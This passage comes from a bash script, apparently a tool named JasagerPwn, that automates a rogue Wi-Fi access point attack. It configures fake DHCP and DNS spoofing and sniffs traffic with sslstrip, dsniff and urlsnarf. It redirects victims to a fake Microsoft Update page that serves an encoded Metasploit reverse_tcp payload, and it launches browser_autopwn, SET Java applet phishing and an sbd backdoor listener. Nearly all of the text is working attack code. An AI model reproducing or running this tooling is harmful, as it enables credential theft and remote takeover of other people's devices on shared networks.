-e "$SETpath/src/payloadgen/pefile.py" ]; then echo -e "\e[01;31m[!]\e[00m Installation Complete!" elif [ ! -e "$SETpath/src/payloadgen/pefile.py" ]; then echo -e "\e[01;31m[!]\e[00m Installation Failed!" fi if [ -d "/tmp/pefile-1.2.10-102/" ]; then rm -rf /tmp/pefile-1.2.10-102/ ; fi fi fi #put up monitor interfaces #loopbreak=`ifconfig | grep mon4 | awk '{print $1}' | cut -b 4` monAttempts="0" while [ ! $moncheck ]; do if [ $monAttempts -ge "3" ]; then echo -e "\e[01;31m[!]\e[00m FATAL: Couldn't Start $MIFACE" && cleanup; fi #if [ ! $loopbreak ]; then sleep 1; else break; fi #ATKcheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4` moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4` xterm -geometry 75x10+464+446 -bg black -fg green -T "JasagerPwn v$version - Start $MIFACE" -e "airmon-ng start $WIFACE" moncheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4` #ATKcheck=`ifconfig | grep $MIFACE | awk '{print $1}' | cut -b 4` monAttempts=$(($monAttempts+1)) done #copy over DNS compatable persistence script if [ ! -e "$msfpath/scripts/meterpreter/persistence_dns.rb" ]; then cp src/persistence_dns.rb "$msfpath/scripts/meterpreter/" ; fi #cleanup www folders if [ -d "$Gwww/" ] ; then rm -rf $Gwww/ ; fi if [ -d "$Jwww/" ] ; then rm -rf $Jwww/ ; fi if [ -d "$Fwww/" ] ; then rm -rf $Fwww/ ; fi sleep 1 #patience if [ ! -d "$Jwww" ]; then mkdir $Jwww/ ; fi if [ ! -d "$Fwww" ]; then mkdir $Fwww/ ; fi if [ ! -d "$Gwww" ]; then mkdir $Gwww/ ; fi if [ ! -d "/tmp/collected" ]; then mkdir /tmp/collected/ ; fi #backup old default index.html if [ -e /var/www/index.htm ]; then mv /var/www/index.htm /var/www/index.htm.OLD elif [ -e /var/www/index.html ]; then mv /var/www/index.html /var/www/index.html.OLD fi #fake update page if [ -d "$Fwww/" ] ; then cp -rf src/wwwFakeupdate/* $Fwww/ fi # google page cp -rf src/wwwGoogle/* $Gwww/ # java required page cp -rf src/wwwJava/* $Jwww/ if [ ! $googleRev ]; then echo -n elif [ $googleRev -gt $rev ]; then echo echo -e "\e[01;31m[!]\e[00m UPDATE: There is an update available!!! Run ./jasagerPwn -u" echo fi echo -e "\e[01;32m[>]\e[00m Creating scripts..." #Dynamic varaibles incase SET changes, which it does and will. SETapache=`cat $SETpath/config/set_config | grep -n "APACHE_SERVER" | awk -F: '{print $1}'` SETapacheDIR=`cat $SETpath/config/set_config | grep -n "APACHE_DIRECT" | awk -F: '{print $1}'` SETredirect=`cat $SETpath/config/set_config | grep -n "AUTO_REDIRECT" | awk -F: '{print $1}'` SETmetscript=`cat $SETpath/config/set_config | grep -n "METERPRETER_MULTI_SCRIPT" | awk -F: '{print $1}'` SETrepeater=`cat $SETpath/config/set_config | grep -n "JAVA_REPEATER=OFF" | awk -F: '{print $1}'` #SET_CONFIG Text Parsing Variables - for javapwn APACHESVR=`cat $SETpath/config/set_config | grep "APACHE_SERVER=ON"` APACHEDIR=`cat $SETpath/config/set_config | grep "/var/www/javapwn"` meterpreterS=`cat $SETpath/config/set_config | grep "METERPRETER_MULTI_SCRIPT=ON"` AREDIRECT=`cat $SETpath/config/set_config | grep "AUTO_REDIRECT=OFF"` JREPEATER=`cat $SETpath/config/set_config | grep "JAVA_REPEATER=ON"` #backup orignal SET config if [ ! -e "$SETpath/config/set_config.ORIGINAL" ]; then cp -f $SETpath/config/set_config $SETpath/config/set_config.ORIGINAL fi #Customize SET config to how we want it.. if [ ! "$APACHESVR" ]; then sed ''${SETapache}'s!APACHE_SERVER=OFF!APACHE_SERVER=ON!g' $SETpath/config/set_config > $SETpath/config/set_config2 # > $SETpath/config/set_configTMP && mv set_configTMP set_config elif [ "$APACHESVR" ]; then mv $SETpath/config/set_config $SETpath/config/set_config2 fi sleep 2 if [ ! "$APACHEDIR" ]; then sed ''${SETapacheDIR}'s!APACHE_DIRECTORY=/var/www!APACHE_DIRECTORY=/var/www/google!g' $SETpath/config/set_config2 > $SETpath/config/set_config3 # > $SEETpath/config/set_configTMP && mv set_configTMP set_config #mv $SETpath/config/set_config $SETpath/config/set_config.leg3nd elif [ "$APACHEDIR" ]; then mv $SETpath/config/set_config2 $SETpath/config/set_config3 fi sleep 2 if [ ! "${AREDIRECT}" ]; then sed ''${SETredirect}'s!AUTO_REDIRECT=ON!AUTO_REDIRECT=OFF!g' $SETpath/config/set_config3 > $SETpath/config/set_config4 # > $SETpath/config/set_configTMP && mv set_configTMP set_config elif [ ! "$AREDIRECT" ]; then mv $SETpath/config/set_config3 $SETpath/config/set_config4 fi sleep 2 if [ ! "${JREPEATER}" ]; then sed ''${SETrepeater}'s!JAVA_REPEATER=OFF!JAVA_REPEATER=ON!g' $SETpath/config/set_config4 > $SETpath/config/set_config5 # > $SETpath/config/set_configTMP && mv set_configTMP set_config elif [ "$JREPEATER" ]; then mv $SETpath/config/set_config4 $SETpath/config/set_config5 fi sleep 2 if [ "$autoMetScript" -eq "1" ] && [ ! "$JREPEATER" ]; then #edit for meterpreter script mode # if [ ! "$meterpreterS" ]; then sed ''${SETmetscript}'s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g' $SETpath/config/set_config5 > $SETpath/config/set_config6 # > $SETpath/config/set_configTMP && mv set_configTMP set_config # fi elif [ "$autoMetScript" -eq "1" ] && [ "$JREPEATER" ]; then sed ''${SETmetscript}'s!METERPRETER_MULTI_SCRIPT=OFF!METERPRETER_MULTI_SCRIPT=ON!g' $SETpath/config/set_config4 > $SETpath/config/set_config5 fi sleep 2 #move config to right spot if [ -e "$SETpath/config/set_config6" ]; then mv $SETpath/config/set_config6 $SETpath/config/set_config fi if [ "$autoMetScript" -eq "0" ] && [ -e "$SETpath/config/set_config5" ] ; then mv $SETpath/config/set_config5 $SETpath/config/set_config elif [ "$autoMetScript" -eq "1" ] && [ -e "$SETpath/config/set_config5" ] ; then mv $SETpath/config/set_config5 $SETpath/config/set_config elif [ "$autoMetScript" -eq "1" ] && [ -e "$SETpath/config/set_config6" ] ; then mv $SETpath/config/set_config6 $SETpath/config/set_config fi sleep 3 #make sure we clean up if [ -e "$SETpath/config/set_config2" ]; then rm $SETpath/config/set_config2 ; fi if [ -e "$SETpath/config/set_config3" ]; then rm $SETpath/config/set_config3 ; fi if [ -e "$SETpath/config/set_config4" ]; then rm $SETpath/config/set_config4 ; fi if [ -e "$SETpath/config/set_config5" ]; then rm $SETpath/config/set_config5 ; fi if [ -e "$SETpath/config/set_config6" ]; then rm $SETpath/config/set_config6 ; fi #Make loop script to isnure our DNS and IP cp /etc/resolv.conf /etc/resolv.conf.ORIGINAL echo "while true ; do gatewayIP=`route -n | awk '/^0.0.0.0/ {getline; print $2}'` && echo "nameserver $gatewayIP" > /etc/resolv.conf && sleep 30 ; done &" > /tmp/resolv.sh chmod +x /tmp/resolv.sh xterm -geometry 0x0+0+0 -e "bash /tmp/resolv.sh" & dnsID2=`echo $!` #Background loop to parse SSLstrip logins #while true; do SSLparse && sleep 5 ; done & #parseID=`echo $!` #DHCP CONF if [ -e "/etc/dhcp3/dhcpd.conf" ]; then mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.ORIGINAL ; fi if [ -e "/tmp/dhcpd.conf" ]; then rm /tmp/dhcpd.conf; fi echo -e "#fakeAP.dhcp ddns-update-style none; one-lease-per-client false; authoritative; ignore client-updates; # Ignore all client requests for DDNS update default-lease-time 60; # 24 hours=86400 max-lease-time 72; # 48 hours=172800 log-facility local7;\n subnet 192.168.10.0 netmask 255.255.255.0 { interface $FONIFACE; range 192.168.10.3 192.168.10.250; option routers 192.168.10.2; option subnet-mask 255.255.255.0; option broadcast-address 192.168.10.255; option domain-name-servers 192.168.10.2; option domain-name \"$DomainName\"; allow unknown-clients; }" >> /etc/dhcp3/dhcpd.conf #backup original SET templates if [ -e "$SETpath/src/html/templates/java/index.template" ]; then mv "$SETpath/src/html/templates/java/index.template" "$SETpath/src/html/templates/java/index.template.ORIGINAL" cp -rf src/wwwJava/* $SETpath/src/html/templates/java/ else cp -rf src/wwwJava/* $SETpath/src/html/templates/java/ fi if [ -e "$SETpath/src/html/templates/google/index.template" ]; then mv "$SETpath/src/html/templates/google/index.template" "$SETpath/src/html/templates/google/index.template.ORIGINAL" cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/ else cp -rf src/wwwGoogle/* $SETpath/src/html/templates/google/ fi #Airdrop-ng Deauther CONF #ourAPmac=`macchanger -s $MIFACE | awk '{ print $3 }' | tr '[a-z]' '[A-Z]'` if [ -e "/tmp/deauth.conf" ] ; then rm "/tmp/deauth.conf" ; fi echo "# Jasager - deauth.conf v$version a/$ourAPmac|any a/00:00:00:00:00:00|any d/any|any" > /tmp/deauth.conf #Add our wifi gateway if needed wifiMAC=`ifconfig $IFACE | grep "HWaddr" | awk '{print $5}' | tr "[a-z]" "[A-Z]"` if [ $WiFiMODE -eq "1" ]; then newIFACEmac=`iwconfig $IFACE | grep "Access Point" | awk '{print $6}'` echo "a/$newIFACEmac|$wifiMAC" >> /tmp/deauth.conf #elif [ ! $wifiMAC ] || [ ! $newIFACEmac ]; then #echo #echo -e "\e[01;31m[!]\e[00m Error: Your Wireless Connection Has no MAC Address.." #echo fi #Host file - MITM WEBSITE if test -e /tmp/BP.dns; then rm /tmp/BP.dns; fi echo "$fonIP *" > /tmp/BP.dns #Vhosts javapwn vhost="/etc/apache2/sites-available/javapwn" if [ -e "$vhost" ] ; then rm "$vhost"; fi echo "<VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot $Jwww <Directory /> Options FollowSymLinks AllowOverride None </Directory> <Directory $Jwww> Options Indexes FollowSymLinks MultiViews AllowOverride None Order allow,deny allow from all </Directory> ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ <Directory "/usr/lib/cgi-bin"> AllowOverride None Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch Order allow,deny Allow from all </Directory> ErrorLog /var/log/apache2/error.log # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. LogLevel warn CustomLog /var/log/apache2/access.log combined Alias /doc/ "/usr/share/doc/" <Directory "/usr/share/doc/"> Options Indexes MultiViews FollowSymLinks AllowOverride None Order deny,allow Deny from all Allow from 127.0.0.0/255.0.0.0 ::1/128 </Directory> ErrorDocument 403 /index.html ErrorDocument 404 /index.html </VirtualHost>" >> $vhost #Vhosts google vhost2="/etc/apache2/sites-available/google" if [ -e "$vhost2" ] ; then rm "$vhost2"; fi echo "<VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot $Gwww <Directory /> Options FollowSymLinks AllowOverride None </Directory> <Directory $Gwww> Options Indexes FollowSymLinks MultiViews AllowOverride None Order allow,deny allow from all </Directory> ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ <Directory "/usr/lib/cgi-bin"> AllowOverride None Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch Order allow,deny Allow from all </Directory> ErrorLog /var/log/apache2/error.log # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. LogLevel warn CustomLog /var/log/apache2/access.log combined Alias /doc/ "/usr/share/doc/" <Directory "/usr/share/doc/"> Options Indexes MultiViews FollowSymLinks AllowOverride None Order deny,allow Deny from all Allow from 127.0.0.0/255.0.0.0 ::1/128 </Directory> ErrorDocument 403 /index.html ErrorDocument 404 /index.html </VirtualHost>" >> $vhost2 #Vhosts fakeupdate vhost3="/etc/apache2/sites-available/fakeupdate" if [ -e "$vhost3" ] ; then rm "$vhost3"; fi echo "<VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot $Fwww <Directory /> Options FollowSymLinks AllowOverride None </Directory> <Directory $Fwww> Options Indexes FollowSymLinks MultiViews AllowOverride None Order allow,deny allow from all </Directory> ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ <Directory "/usr/lib/cgi-bin"> AllowOverride None Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch Order allow,deny Allow from all </Directory> ErrorLog /var/log/apache2/error.log # Possible values include: debug, info, notice, warn, error, crit, # alert, emerg. LogLevel warn CustomLog /var/log/apache2/access.log combined Alias /doc/ "/usr/share/doc/" <Directory "/usr/share/doc/"> Options Indexes MultiViews FollowSymLinks AllowOverride None Order deny,allow Deny from all Allow from 127.0.0.0/255.0.0.0 ::1/128 </Directory> ErrorDocument 403 /index.php ErrorDocument 404 /index.php </VirtualHost>" >> $vhost3 #SET automate scripts, can be TOUCHY. #run as template rather then imported if [ -e "/tmp/auto-java2" ] ; then rm "/tmp/auto-java2" ; fi echo -e "\n2\n1\n1\n1\n2\n16" > /tmp/auto-java2 # echo -e "2 # 1 # 1 # 1 # 2 # 16" > /tmp/auto-java2 #run as template rather then imported if [ -e "/tmp/auto-google2" ] ; then rm "/tmp/auto-google2" ; fi echo -e "\n2\n1\n1\n3\n2\n16" > /tmp/auto-google2 # echo -e "2 # 1 # 1 # 3 # 2 # 16" > /tmp/auto-google2 #DIFFERENT METHOD OF USING THE TEMPLATES. #fancy clone of java DL website - not used # if [ -e "/tmp/auto-java" ] ; then rm "/tmp/auto-java" ; fi # echo -e "2 # 1 # 3 # $pwd/src/wwwJava/ # 2 # 16" > /tmp/auto-java #fancy clone of google - not used # if [ -e "/tmp/auto-google" ] ; then rm "/tmp/auto-google" ; fi # echo -e "2 # 1 # 3 # $pwd/src/wwwGoogle/ # 2 # 16" > /tmp/auto-google if [ $autoMetScript -eq 1 ]; then metScript #Metasploit rc w/ auto script if [ -e "/tmp/msfrc" ] ; then rm "/tmp/msfrc" ; fi echo -e "use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST $ourIP set ExitOnSession false set InitialAutorunScript multiscript -rc /pentest/exploits/SET/src/program_junk/multi_meter.file exploit -j" > /tmp/msfrc #Metasploit rc w/ auto script BP if [ -e "/tmp/msfrcBP" ] ; then rm "/tmp/msfrcBP" ; fi echo -e "use auxiliary/server/browser_autopwn set PAYLOAD windows/meterpreter/reverse_tcp set LHOST $ourIP set SRVPORT 80 set SRVHOST $ourIP set URIPATH / set ExitOnSession false set InitialAutorunScript multiscript -rc /pentest/exploits/SET/src/program_junk/multi_meter.file run -j" > /tmp/msfrcBP elif [ $autoMetScript -eq 0 ]; then #Metasploit rc no auto script if [ -e "/tmp/msfrc" ] ; then rm "/tmp/msfrc" ; fi echo -e "use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST $ourIP set ExitOnSession false exploit -j" > /tmp/msfrc #Metasploit rc no auto script BP if [ -e "/tmp/msfrcBP" ] ; then rm "/tmp/msfrcBP" ; fi echo -e "use auxiliary/server/browser_autopwn set PAYLOAD windows/meterpreter/reverse_tcp set LHOST $ourIP set SRVPORT 80 set SRVHOST $ourIP set URIPATH / set ExitOnSession false run -j" > /tmp/msfrcBP fi sleep 1 #USING DNS VIA IPTABLES TO GATEWAY #echo -e "\e[01;32m[>]\e[00m Starting DNS services..." #xterm -geometry 75x5+0+94 -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" & #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" & #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - Tunnel DNS" -e "while true; do sleep 60 && echo 'Tunneling $ourIP DNS Requests through $gatewayIP...';done" & #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - DNS" -e "dnsmasq -C /tmp/Jasager.dnsmasq" & #DNSID=`echo $!` echo -e "\e[01;32m[>]\e[00m Enabling ipv4 Forwarding..." xterm -geometry 0x0+0+0 -e "modprobe tun" & echo "1" > /proc/sys/net/ipv4/ip_forward #tail messages for DHCP info xterm -geometry 75x16+0+509 -bg black -fg red -T "[JasagerPwn-DHCP] v$version" -e "tail -f /var/log/messages | grep DHCP" & messageID=`echo $!` echo -e "\e[01;32m[>]\e[00m Starting up DHCP3..." xterm -geometry 75x9+0+474 -bg black -fg green -T "Starting DHCP3 Server" -e "/etc/init.d/dhcp3-server start" & echo -e "\e[01;32m[>]\e[00m Loading URL Snarf/Driftnet..." xterm -geometry 0x0+0+0 -e "driftnet -v -s -i $FONIFACE" & xterm -geometry 75x24+464+405 -bg black -fg green -T "[JasagerPwn-DSniff] v$version" -e "dsniff -i $FONIFACE" & dsniffID=`echo $!` xterm -geometry 75x37+0+0 -bg black -fg green -T "[JasagerPwn-URLSnarf] v$version" -e "urlsnarf -i $FONIFACE" & echo -e "\e[01;32m[>]\e[00m Setting up IP Tables..." IPTABLES echo -e "\e[01;36m[~]\e[00m leg3nd's JasagerPwn v$version Started! More @ www.info-s3curity.com" echo #MAIN OPTIONS FOR AP ATTACKS while true do echo echo echo ifconfig $FONIFACE $fonIP echo -e "\e[01;31m[+][-----------------------------------------------------------------][+]\e[00m" echo -e "\e[01;31m[+][==========================-Main Menu-============================][+]\e[00m" echo -e "\e[01;31m[+][-----------------------------------------------------------------][+]\e[00m" #echo -e "\e[01;32m[!]\e[00m Press [S]niff, [F]akeUpdate, [D]eAuth, [B]rowserPwn, [J]ava Attack, e[X]it " if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then echo -e "\e[01;36m [*] Attack Status: Idle..\e[00m" elif [ $sniffing -eq 1 ]; then echo -e "\e[01;31m [*] Attack Status: SSLstrip & Sniffing\e[00m" elif [ $browserpwn -eq 1 ]; then echo -e "\e[01;31m [*] Attack Status: MSF Browser-AutoPwn\e[00m" elif [ $fakeupdate -eq 1 ]; then echo -e "\e[01;31m [*] Attack Status: MSF Fake Update\e[00m" elif [ $javaATK -eq 1 ]; then echo -e "\e[01;31m [*] Attack Status: SET Java Applet\e[00m" fi echo -e "\e[01;32m[-]\e[00m [1][S] = Sniff The APs Network." echo -e "\e[01;32m[-]\e[00m [2][F] = Redirect LAN to Fake Microsoft Update Page. (MS Only)" echo -e "\e[01;32m[-]\e[00m [3][B] = Redirect LAN to Metasploit BrowserAutopwn. (Any OS)" echo -e "\e[01;32m[-]\e[00m [4][J] = Redirect LAN to Java Applet Page. (Any OS) " echo -e "\e[01;32m[-]\e[00m [5][D] = De-Authorize Clients on other APs." echo -e "\e[01;32m[-]\e[00m [6][N] = Adjust Network and Internet Settings" echo -e "\e[01;32m[-]\e[00m [7][X] = Exit Jasager Script" echo -n -e "\e[01;31m [?] Choose an attack for AP:\e[00m " read -e CONFIRM3 echo case $CONFIRM3 in s|S|sniff|Sniff|1) if [ $browserpwn -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. IPtables Conflict." elif [ $javaATK -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict." elif [ $fakeupdate -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. IPtables Conflict." elif [ $sniffing -eq 0 ]; then iptables -t nat -A PREROUTING --in-interface $FONIFACE -p tcp --destination-port 80 -j REDIRECT --to-ports $sslport xterm -geometry 75x3+1-25 -bg black -fg green -e "sslstrip -l $sslport && sleep 3" & if [ -e sslstrip.log ]; then xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" & TAILPID=`echo $!` else touch sslstrip.log xterm -geometry 75x24+464+65 -bg black -fg green -T "SSLStrip Sniffing" -e "tail -f sslstrip.log" & TAILPID=`echo $!` fi echo -e "\e[01;33m[!]\e[00m\e[00m Attack Started: SSLStripping / Sniffing" wasSniffing="1" sniffing="1" elif [ $sniffing -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Your Already Sniffing!!" fi #xterm -geometry 75x20+464+288 -bg black -fg green -e "dsniff -i $FONIFACE" & ;; J|j|java|Java|4) if [ $browserpwn -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. Port Conflict." elif [ $fakeupdate -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port Conflict." elif [ $javaATK -eq 0 ]; then echo -n -e "\e[01;33m[!]\e[00m [1][G]oogle or [2][J]ava Required: " read -e JavaSite case $JavaSite in G|g|Google|google|1) if [ $autoMetScript -eq 1 ]; then metScript; fi javasite="1" JavaSite xterm -geometry 75x8+100+0 -fg green -bg black -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart" xterm -geometry 75x8+100+0 -fg green -bg black -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite google && /etc/init.d/apache2 reload" xterm -fg green -bg black -geometry 110x42+464-38 -T "[SET-JavaApplet] v$version - WebServer" -e "cd $SETpath && ./set-automate /tmp/auto-google2" & ;; J|j|Java|java|2) if [ $autoMetScript -eq 1 ]; then metScript; fi javasite="2" && sleep 1 JavaSite xterm -geometry 75x8+100+0 -bg black -fg green -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart" xterm -geometry 75x8+100+0 -bg black -fg green -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite javapwn && /etc/init.d/apache2 reload" xterm -fg green -bg black -geometry 110x42+464-38 -T "[SET-JavaApplet] v$version - WebServer" -e "cd $SETpath && ./set-automate /tmp/auto-java2" & ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac echo -n -e "\e[01;34m[*]\e[00m Press [ENTER] when SET is ready.." read -e $blahblahblah ipTableRedirect if [ $autoMetScript -eq 1 ]; then metScript; fi echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..." #iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT #iptables --table nat --append PREROUTING --in-interface $FONIFACE #Check for bad index.html.. whys it index2.html? lolwtf if [ -e "$SETpath/src/web_clone/site/template/index2.html" ] && [ ! -e "$SETpath/src/web_clone/site/template/index.html" ]; then mv "$SETpath/src/web_clone/site/template/index2.html" "$SETpath/src/web_clone/site/template/index.html" fi if [ -e "/var/www/javapwn/index2.html" ] && [ ! -e "/var/www/javapwn/index.html" ]; then mv "/var/www/javapwn/index2.html" "/var/www/javapwn/index.html" fi xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-Kill DNS] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & sleep 2 xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version - DNSSpoof" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" & javaATK="1" fi while true do if [ $browserpwn -eq 1 ]; then break; fi if [ $fakeupdate -eq 1 ]; then break; fi #echo -n "[?] Enter [I] to give Internet back or [M] for Main Menu: " #read -e $CONFIRM7 echo echo -e "\e[01;33m[MODE][==========-Java Applet Attack SET-==========][!]\e[00m" echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: " read -e USR_CHOICE9 #read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE9 case $USR_CHOICE9 in S|s|Stop|stop|1) xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" & IPTABLES xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e "/etc/init.d/apache2 stop" & javaATK="0" sleep 3 #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" & if [ $wasSniffing != "0" ]; then sslstrip fi echo -e "\e[01;33m[!]\e[00m DONT FORGET TO RUN 'ipconfig /flushdns' ON VICTIM!!" break ;; M|m|Menu|menu|2) break ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done ;; F|f|fakeupdate|Fakeupdate|2) if [ $browserpwn -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with browserPwn. Port Conflict." elif [ $javaATK -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict." elif [ $fakeupdate -eq 0 ]; then if [ $autoMetScript -eq 1 ]; then metScript; fi echo -e "\e[01;33m[!]\e[00m Creating Exploit (Windows)..." xterm -geometry 75x15+10+0 -bg black -fg green -T "[Metasploit Payload] v$version - Metasploit (Windows)" -e "msfpayload windows/meterpreter/reverse_tcp LHOST=$ourIP R | msfencode -x $Fwww/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o $Fwww/Windows-KB183905-x86-ENU.exe" echo -e "\e[01;33m[!]\e[00m Forcing LAN to visit our site..." ipTableRedirect #iptables -t nat -A PREROUTING --in-interface $FONIFACE -p udp -j DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $ourIP #iptables --table nat --append PREROUTING --in-interface $FONIFACE --jump REDIRECT #iptables --table nat --append PREROUTING --in-interface $FONIFACE #xterm -geometry 110x42+464-38 -bg black -fg green -T "[MFU Handler] v$version - Metasploit" -e "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=$ourIP E" & xterm -geometry 110x42+464-38 -bg black -fg green -T "[Metasploit Handler] v$version - Metasploit" -e "msfconsole -r /tmp/msfrc" & echo -e "\e[01;33m[!]\e[00m Getting the backdoor (SBD) ready..." xterm -geometry 75x22+10+450 -bg black -fg green -T "[JasagerPwn-SBD] v$version - SBD" -e "sbd -l -k leg3nd -p $port" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & sleep 3 xterm -geometry 75x7+0-36 -bg black -fg green -T "[JasagerPwn-DNS Spoof] v$version - DNSSpoof" -e "dnsspoof -i $FONIFACE -f /tmp/BP.dns" & fakeupdate="1" echo -e "\e[01;32m[>]\e[00m Starting Web Server @ $ourIP:80..." xterm -geometry 75x8+100+0 -T "v$version - Starting Apache2" -e "/etc/init.d/apache2 restart" xterm -geometry 75x8+100+0 -T "v$version - Starting Apache2" -e "ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite fakeupdate && a2enmod php5 && /etc/init.d/apache2 reload" fi while true do if [ $browserpwn -eq 1 ]; then break; fi if [ $javaATK -eq 1 ]; then break; fi #echo -n "[?] Enter [I] to give Internet back or [M] for Main Menu: " #read -e $CONFIRM7 echo echo -e "\e[01;33m[MODE][==========-FakeUpdate Metasploit-==========][!]\e[00m" #read -r -p "[?] Enter [I] to give Internet back or [M] for Main Menu: " USR_CHOICE1 echo -e -n "\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: " read -e USR_CHOICE1 case $USR_CHOICE1 in S|s|Stop|stop|1) xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --jump REDIRECT" & xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-IPTABLES] v$version" -e "iptables --table nat --delete PREROUTING --in-interface $FONIFACE --proto tcp --jump DNAT --to $fonIP" & IPTABLES xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version" -e "killall -9 dnsspoof" & xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version" -e "/etc/init.d/apache2 stop" & fakeupdate="0" sleep 3 #xterm -geometry 75x5+0+94 -bg black -fg green -T "JasagerPwn v$version - FakeDNS" -e "dnsspoof -i $FONIFACE -f /tmp/Jasager.dns" & if [ $wasSniffing != "0" ]; then sslstrip fi echo -e "\e[01;33m[!]\e[00m DONT FORGET TO RUN 'ipconfig /flushdns' ON VICTIM!!" break ;; M|m|Menu|menu|2) break ;; *) echo -e "\e[01;31m[!]\e[00m Error: Please Choose From The Menu.." esac done ;; B|b|browserpwn|browserPwn|3) if [ $fakeupdate -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port conflict." elif [ $javaATK -eq 1 ]; then echo -e "\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict." elif [ $browserpwn -eq 0 ]; then if [ $autoMetScript -eq 1 ]; then metScript; fi xterm -geometry 75x7+10+330 -bg black -fg green -T "[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof" -e "killall -9 dnsspoof" & xterm -geometry 75x5+0+94 -bg black -fg green -T "[JasagerPwn-Apache Kill] v$version - Stopping Apache2" -e 